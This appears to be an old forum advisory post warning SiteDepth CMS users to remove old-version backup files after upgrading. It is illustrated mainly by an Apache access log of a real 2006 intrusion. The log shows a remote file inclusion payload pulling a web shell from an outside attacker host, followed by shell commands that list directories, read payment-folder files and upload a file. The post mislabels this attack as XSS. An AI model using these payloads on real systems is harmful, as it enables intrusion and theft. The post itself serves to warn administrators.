Security Advisories for multiple products

[cd34]

Wordpress: http://wordpress.org/development/2006/07/wordpress-204/

If you run sitedepth, you might want to make sure you clean up the old backups after the upgrades are done. Here's a log showing how XSS works using a current, updated version of sitedepth. The new version was fixed with a patch from SiteDepth due to this thread, however, they methodically store their 'old versions' after upgrade in a pretty predictable manner. No problem for the script kiddie to stumble across the files he needed. After this person exploited the site, they loaded a shell on one of the sitedepth main scripts located in a directory which was world writeable -- way to go guys.

Code:

84.169.229.61 - - [02/Aug/2006:17:17:28 -0400] "GET /sd3/ HTTP/1.1" 404 202 "http://www.xxx-xxxxxx.com/sd3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
84.169.229.61 - - [02/Aug/2006:17:58:53 -0400] "GET /sitedepth3/ HTTP/1.1" 200 1101 "http://www.xxx-xxxxxx.com/sitedepth3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

[guy surfs front page of site to confirm site is running sitedepth. clipped]

84.169.229.61 - - [02/Aug/2006:18:01:04 -0400] "GET /constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:13 -0400] "GET /sitedepth3/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 8 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:19 -0400] "GET /sitedepth3/backup/ HTTP/1.1" 403 220 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:26 -0400] "GET /sitedepth3/backup/previous_versions/ HTTP/1.1" 403 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:35 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt? HTTP/1.1" 200 5469 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 18624 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http://www.paradox-hackz.de/showimg.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:46 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 22411 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:01:55 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 8457 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:06 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 142138 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=." "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:16 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//_old_sitedepth HTTP/1.1" 200 76195 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:26 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:33 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//previews HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:02:42 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill HTTP/1.1" 200 18781 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"84.169.229.61 - - [02/Aug/2006:18:02:50 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=file&file=/var/www/xxuserxx/xxx-xxxxxx.com/ccbill/*index.htm HTTP/1.1" 200 16180 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//ccbill" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:08 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections HTTP/1.1" 200 9534 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:11 -0400] "GET /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections HTTP/1.1" 200 5670 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=dir&dir=/var/www/xxuserxx/xxx-xxxxxx.com//sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"
84.169.229.61 - - [02/Aug/2006:18:03:22 -0400] "POST /sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r& HTTP/1.1" 200 5132 "http://www.xxx-xxxxxx.com/sitedepth3/backup/previous_versions/2.74/constants.php?SD_DIR=http%3A%2F%2Fwww.paradox-hackz.de%2Fshowimg.txt%3F&&s=r&cmd=upload&dir=/var/www/xxuserxx/xxx-xxxxxx.com/sections&lastcmd=dir&lastdir=/var/www/xxuserxx/xxx-xxxxxx.com/sections" "Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5"